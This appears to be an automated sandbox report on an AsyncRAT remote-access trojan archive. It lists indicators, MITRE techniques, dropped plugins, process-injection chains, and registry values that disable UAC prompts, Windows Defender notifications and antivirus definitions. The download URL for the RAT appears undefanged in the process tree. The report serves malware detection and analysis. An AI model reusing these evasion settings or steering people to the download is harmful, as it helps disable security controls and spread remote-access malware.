asyncrat | hxxps://github[.]com/ToolsHacking/AsyncRAT/releases/download/v0[.]6[.]8a/AsyncRAT[.]v0[.]6[.]8a[.]zip

Analysis

max time kernel
264s
max time network
266s
platform
windows7_x64
resource
win7-20221111-en
resource tags

arch:x64arch:x86image:win7-20221111-enlocale:en-usos:windows7-x64system
submitted
23-11-2022 11:24

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://github.com/ToolsHacking/AsyncRAT/releases/download/v0.6.8a/AsyncRAT.v0.6.8a.zip

Score

10^/10

asyncrat evasion rat trojan

Malware Config

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Deletes Windows Defender Definitions 2 TTPs 2 IoCs
Uses mpcmdrun utility to delete all AV definitions.
evasion

Impair Defenses
T1562

Command-Line Interface
T1059

Processes:

MpCmdRun.exeMpCmdRun.exe

pid process

2320 MpCmdRun.exe
928 MpCmdRun.exe

pid	process
2320	MpCmdRun.exe
928	MpCmdRun.exe

Malicious RTF document (CVE-2017-0199) 1 IoCs

Processes:

resource	yara_rule
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\instruction.rtf	rtf_objdata_urlmoniker_http

Modifies Windows Defender notification settings 3 TTPs 4 IoCs

evasion trojan

Modify Existing Service

T1031

Modify Registry

T1112

Disabling Security Tools

T1089

Processes:

WScript.exeWScript.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1"	WScript.exe

UAC bypass 3 TTPs 6 IoCs

evasion trojan

Bypass User Account Control

T1088

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0"	powershell.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	powershell.exe

Async RAT payload 15 IoCs

rat

Processes:

resource	yara_rule
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe	asyncrat
\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Stub\Stub.exe	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendMemory.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendFile.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteDesktop.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteCamera.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\ProcessManager.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Options.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Miscellaneous.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\LimeLogger.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileSearcher.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Extra.dll	asyncrat
C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Chat.dll	asyncrat

Modifies Windows Firewall 1 TTPs 2 IoCs
evasion

Modify Existing Service
T1031

Processes:

netsh.exenetsh.exe

pid process

2684 netsh.exe
1568 netsh.exe
Loads dropped DLL 1 IoCs

Processes:

AsyncRAT v0.6.8a.exe

pid process

1468 AsyncRAT v0.6.8a.exe

pid	process
2684	netsh.exe
1568	netsh.exe

pid	process
1468	AsyncRAT v0.6.8a.exe

Windows security modification 2 TTPs 6 IoCs

evasion trojan

Disabling Security Tools

T1089

Modify Registry

T1112

Processes:

WScript.exeWScript.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\Notification_Suppress = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\UILockdown = "0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\Notification_Suppress = "1"	WScript.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration\UILockdown = "0"	WScript.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\UX Configuration	WScript.exe

Drops file in System32 directory 64 IoCs

Processes:

AsyncRAT v0.6.8a.exeAsyncRAT v0.6.8a.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Fixer.bat	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\LimeLogger.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendMemory.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Fixer.bat	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Recovery.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteCamera.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Chat.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\DO NOT DELETE (ServerCertificate).txt	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\DO NOT DELETE (ServerCertificate).txt	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\instruction.rtf	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\LimeLogger.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Stub	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileSearcher.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteDesktop.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendFile.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\instruction.rtf	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteCamera.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe.config	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_7188245	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\__tmp_rar_sfx_access_check_7238929	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Stub\Stub.exe	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Options.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\RemoteDesktop.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Stub\Stub.exe	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Options.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\AsyncRAT.exe.config	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileManager.dll.vbe	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Stub	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Chat.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\ProcessManager.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Fixer.bat	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\LimeLogger.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\FileSearcher.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\ProcessManager.dll	AsyncRAT v0.6.8a.exe
File created	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendFile.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\SendMemory.dll	AsyncRAT v0.6.8a.exe
File opened for modification	C:\Windows\SysWOW64\AsyncRAT v0.6.8a\Plugins\Miscellaneous.dll	AsyncRAT v0.6.8a.exe

Drops file in Windows directory 4 IoCs

Processes:

Dism.exeDism.exeDism.exeDism.exe

description	ioc	process
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe
File opened for modification	C:\Windows\Logs\DISM\dism.log	Dism.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exeschtasks.exeschtasks.exeschtasks.exe

pid process

1680 schtasks.exe
2900 schtasks.exe
2304 schtasks.exe
2928 schtasks.exe

pid	process
1680	schtasks.exe
2900	schtasks.exe
2304	schtasks.exe
2928	schtasks.exe

Modifies Internet Explorer Phishing Filter 1 TTPs 2 IoCs

Modify Registry

T1112

Processes:

iexplore.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PhishingFilter	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 90aebac336ffd801	iexplore.exe

Modifies Internet Explorer settings 1 TTPs 33 IoCs

adware spyware

Modify Registry

T1112

Processes:

iexplore.exeAsyncRAT v0.6.8a.exeAsyncRAT v0.6.8a.exeIEXPLORE.EXEAsyncRAT v0.6.8a.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\en-US = "en-US.1"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MINIE	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	AsyncRAT v0.6.8a.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	AsyncRAT v0.6.8a.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\FileNames\	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "375971333"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{E7AF1E31-6B29-11ED-A8EF-5A9C998014C3} = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\MINIE\TabBandWidth = "500"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\Main	AsyncRAT v0.6.8a.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-3406023954-474543476-3319432036-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe

Suspicious behavior: EnumeratesProcesses 22 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1008	powershell.exe
1596	powershell.exe
1656	powershell.exe
1072	powershell.exe
1584	powershell.exe
684	powershell.exe
760	powershell.exe
1052	powershell.exe
108	powershell.exe
980	powershell.exe
2820	powershell.exe
2784	powershell.exe
2864	powershell.exe
2832	powershell.exe
2952	powershell.exe
2924	powershell.exe
2216	powershell.exe
2292	powershell.exe
2080	powershell.exe
1372	powershell.exe
1416	powershell.exe
3024	powershell.exe

Suspicious use of AdjustPrivilegeToken 22 IoCs

Processes:

description	pid	process
Token: SeDebugPrivilege	1008	powershell.exe
Token: SeDebugPrivilege	1596	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	1584	powershell.exe
Token: SeDebugPrivilege	684	powershell.exe
Token: SeDebugPrivilege	760	powershell.exe
Token: SeDebugPrivilege	1052	powershell.exe
Token: SeDebugPrivilege	108	powershell.exe
Token: SeDebugPrivilege	980	powershell.exe
Token: SeDebugPrivilege	2820	powershell.exe
Token: SeDebugPrivilege	2784	powershell.exe
Token: SeDebugPrivilege	2864	powershell.exe
Token: SeDebugPrivilege	2832	powershell.exe
Token: SeDebugPrivilege	2952	powershell.exe
Token: SeDebugPrivilege	2924	powershell.exe
Token: SeDebugPrivilege	2216	powershell.exe
Token: SeDebugPrivilege	2292	powershell.exe
Token: SeDebugPrivilege	2080	powershell.exe
Token: SeDebugPrivilege	1372	powershell.exe
Token: SeDebugPrivilege	1416	powershell.exe
Token: SeDebugPrivilege	3024	powershell.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

iexplore.exe

pid process

1664 iexplore.exe
1664 iexplore.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

iexplore.exeIEXPLORE.EXEAsyncRAT v0.6.8a.exeAsyncRAT v0.6.8a.exeAsyncRAT v0.6.8a.exe

pid	process
1664	iexplore.exe
1664	iexplore.exe
1108	IEXPLORE.EXE
1108	IEXPLORE.EXE
1108	IEXPLORE.EXE
1108	IEXPLORE.EXE
432	AsyncRAT v0.6.8a.exe
432	AsyncRAT v0.6.8a.exe
1468	AsyncRAT v0.6.8a.exe
1468	AsyncRAT v0.6.8a.exe
304	AsyncRAT v0.6.8a.exe
304	AsyncRAT v0.6.8a.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

iexplore.exeAsyncRAT v0.6.8a.exeWScript.exeWScript.exepowershell.exeAsyncRAT v0.6.8a.exeWScript.exe

description	pid	process	target process
PID 1664 wrote to memory of 1108	1664	iexplore.exe	IEXPLORE.EXE
PID 1664 wrote to memory of 1108	1664	iexplore.exe	IEXPLORE.EXE
PID 1664 wrote to memory of 1108	1664	iexplore.exe	IEXPLORE.EXE
PID 1664 wrote to memory of 1108	1664	iexplore.exe	IEXPLORE.EXE
PID 432 wrote to memory of 1716	432	AsyncRAT v0.6.8a.exe	WScript.exe
PID 432 wrote to memory of 1716	432	AsyncRAT v0.6.8a.exe	WScript.exe
PID 432 wrote to memory of 1716	432	AsyncRAT v0.6.8a.exe	WScript.exe
PID 432 wrote to memory of 1716	432	AsyncRAT v0.6.8a.exe	WScript.exe
PID 1716 wrote to memory of 864	1716	WScript.exe	WScript.exe
PID 1716 wrote to memory of 864	1716	WScript.exe	WScript.exe
PID 1716 wrote to memory of 864	1716	WScript.exe	WScript.exe
PID 1716 wrote to memory of 864	1716	WScript.exe	WScript.exe
PID 864 wrote to memory of 760	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 760	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 760	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 760	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1052	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1052	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1052	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1052	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 684	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 684	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 684	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 684	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1584	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1584	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1584	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1584	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1008	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1008	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1008	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1008	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1072	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1072	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1072	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1072	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 108	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 108	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 108	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 108	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1656	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1656	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1656	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1656	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1596	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1596	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1596	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 1596	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 980	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 980	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 980	864	WScript.exe	powershell.exe
PID 864 wrote to memory of 980	864	WScript.exe	powershell.exe
PID 1596 wrote to memory of 2320	1596	powershell.exe	MpCmdRun.exe
PID 1596 wrote to memory of 2320	1596	powershell.exe	MpCmdRun.exe
PID 1596 wrote to memory of 2320	1596	powershell.exe	MpCmdRun.exe
PID 1596 wrote to memory of 2320	1596	powershell.exe	MpCmdRun.exe
PID 1468 wrote to memory of 2520	1468	AsyncRAT v0.6.8a.exe	WScript.exe
PID 1468 wrote to memory of 2520	1468	AsyncRAT v0.6.8a.exe	WScript.exe
PID 1468 wrote to memory of 2520	1468	AsyncRAT v0.6.8a.exe	WScript.exe
PID 1468 wrote to memory of 2520	1468	AsyncRAT v0.6.8a.exe	WScript.exe
PID 2520 wrote to memory of 2628	2520	WScript.exe	WScript.exe
PID 2520 wrote to memory of 2628	2520	WScript.exe	WScript.exe
PID 2520 wrote to memory of 2628	2520	WScript.exe	WScript.exe
PID 2520 wrote to memory of 2628	2520	WScript.exe	WScript.exe

C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe" https://github.com/ToolsHacking/AsyncRAT/releases/download/v0.6.8a/AsyncRAT.v0.6.8a.zip
1⤵
- Modifies Internet Explorer Phishing Filter
- Modifies Internet Explorer settings
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1664

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
